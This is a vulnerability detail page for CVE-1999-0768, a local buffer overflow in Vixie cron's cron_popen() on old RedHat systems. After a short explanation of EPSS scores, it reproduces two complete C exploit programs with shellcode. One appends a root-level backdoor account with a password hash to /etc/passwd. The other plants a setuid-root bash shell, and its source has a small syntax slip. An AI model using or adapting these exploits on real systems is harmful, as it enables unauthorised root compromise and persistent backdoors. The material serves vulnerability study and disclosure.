CVE-1999-0768 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/602/info The version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflown in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack. /* vixie-crontab-3.0.1 cron_popen() exploit by Akke - 30-8-99 Akke <[email protected]> how to compile ? gcc crontab_exploit.c -o crontab_exploit how to use ? ./crontab_exploit crontab ./CrOn wait 1 minute crontab -r su -l cronexpl (password = exploited) (this is root account) Greets to: bugtraq */ #include <stdio.h> #include <stdlib.h> #include <string.h> char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/ce"; #define max_buf_len 1000 #define CronFile "CrOn" #define RootScript "/tmp/cron_root" #define CronEchoScript "/tmp/cron_echo" #define chmod_bin "/bin/chmod" int main() { char crontab_file_string[max_buf_len]; char temp[max_buf_len]; FILE *fp; int i; strcpy(temp, "T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w r i t t e n _ b y _ A K K E _ " "T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w r i t t e n _ b y _ A K K E _ " "_ _ _ _ _ _ _ _ _ _ _ _ _ _ "); sprintf(temp,"%s%s",temp,shellcode); sprintf(crontab_file_string,"MAILTO=%s\n",temp); strcat(crontab_file_string,"0"); for (i=1;i<60;i++) sprintf(crontab_file_string,"%s,%d",crontab_file_string,i); sprintf(temp," * * * * %s\n",CronEchoScript); strcat(crontab_file_string,temp); if ((fp = fopen(CronFile,"w+")) != NULL) { fprintf(fp,"%s",crontab_file_string); fclose(fp); } if ((fp = fopen(CronEchoScript,"w+")) != NULL) { fprintf(fp,"#!/bin/sh\necho Wrong window!"); fclose(fp); sprintf(temp,"%s 777 %s",chmod_bin,CronEchoScript); system(temp); } if ((fp = fopen(RootScript,"w+")) != NULL) { #define login "cronexpl" #define passw "1T8uqGnJZ0OsQ" /* "exploited" */ fprintf(fp,"#!/bin/sh\necho %s:%s:0:0::/root:/bin/bash >> /etc/passwd\nrm %s %s %s",login,passw,CronEchoScript,"/tmp/ce",RootScript); fclose(fp); sprintf(temp,"%s 777 %s",chmod_bin,RootScript); system(temp); } if ((fp = fopen("/tmp/ce","w+")) != NULL) { fprintf(fp,"#!/bin/sh\n%s\n",RootScript); fclose(fp); sprintf(temp,"%s 777 %s",chmod_bin,"/tmp/ce"); system(temp); } exit(0); }

// source: https://www.securityfocus.com/bid/602/info The version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflown in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack. /* * VixieCron 3.0 Proof of Concept Exploit - w00w00 * * Not only does Paul give up root with this one, but with his creative use of * strtok() he actually ends up putting the address of our shellcode in eip. * * Many Thanks: Cheez Wiz, Sangfroid * Thanks: stran9er, Shok * Props: attrition.org,mea_culpa,awr,minus,Int29,napster,el8.org,w00w00 * Drops: Vixie, happyhacker.org, antionline.com, <insert your favorite web \ * defacement group here> * * Hellos: pm,cy,bm,ceh,jm,pf,bh,wjg,spike. * * [email protected] * */ #include <stdio.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <pwd.h> char shellcode[] = "\xeb\x40\x5e\x89\x76\x0c\x31\xc0\x89\x46\x0b\x89\xf3\xeb" "\x27w00w00:Ifwewerehackerswedownyourdumbass\x8d\x4e" "\x0c\x31\xd2\x89\x56\x16\xb0\x0b\xcd\x80\xe8\xbb\xff\xff" "\xff/tmp/w00w00"; int main(int argc,char *argv[]) FILE *cfile,*tmpfile; struct stat sbuf; struct passwd *pw; int x; pw = getpwuid(getuid()); chdir(pw->pw_dir); cfile = fopen("./cronny","a+"); tmpfile = fopen("/tmp/w00w00","a+"); fprintf(cfile,"MAILTO="); for(x=0;x<96;x++) fprintf(cfile,"w00w00 "); fprintf(cfile,"%s",shellcode); fprintf(cfile,"\n* * * * * date\n"); fflush(cfile); fprintf(tmpfile,"#!/bin/sh\ncp /bin/bash %s\nchmod 4755 %s/bash\n", pw->pw_dir,pw->pw_dir); fflush(tmpfile); fclose(cfile),fclose(tmpfile); chmod("/tmp/w00w00",S_IXUSR|S_IXGRP|S_IXOTH); if(!(fork())) { execl("/usr/bin/crontab","crontab","./cronny",(char *)0); } else { printf("Waiting for shell be patient....\n"); for(;;) { if(!(stat("./bash",&sbuf))) { break; } else { sleep(5); } } if((fork())) { printf("Thank you for using w00warez!\n"); execl("./bash","bash",(char *)0); } else { remove("/tmp/w00w00"); sleep(5); remove("./bash"); remove("./cronny"); execl("/usr/bin/crontab","crontab","-r",(char *)0); } } }